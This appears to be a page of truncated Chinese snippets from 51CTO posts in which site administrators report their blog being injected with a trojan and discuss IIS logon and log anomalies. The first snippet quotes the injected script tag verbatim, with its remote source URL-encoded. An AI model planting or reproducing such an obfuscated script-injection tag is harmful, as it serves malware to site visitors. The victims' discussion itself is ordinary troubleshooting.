近段时间,blog经常被<script src=http://%76%63%63%64%2E%63%6E></script>挂上木马。搜集资料,也做过相应css样式来解决,但css不能阻止页面有此木马,只是客户端访问的时候,屏蔽掉或者终止掉,测试后杀毒软件还是会提示网
系统的安全日志里,有IUSER账号的登录注销,而且登录类型8。起初以为是被黑了,后来观察发现,就算在gpedit里允许本地登录,没有IUSER账号,每次重启IIS的时候,也会在安全日志里,已这个身份进行登录/注销,登录类型为8.
IIS日志时间与系统时间不符 &nb
blog又被script挂马了,郁闷 查看系统日志,IUSER-账户有登陆记录,并且登录类型为8 登录过程为Advapi ,身份验证数据包 :Negotiate 估计被
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号
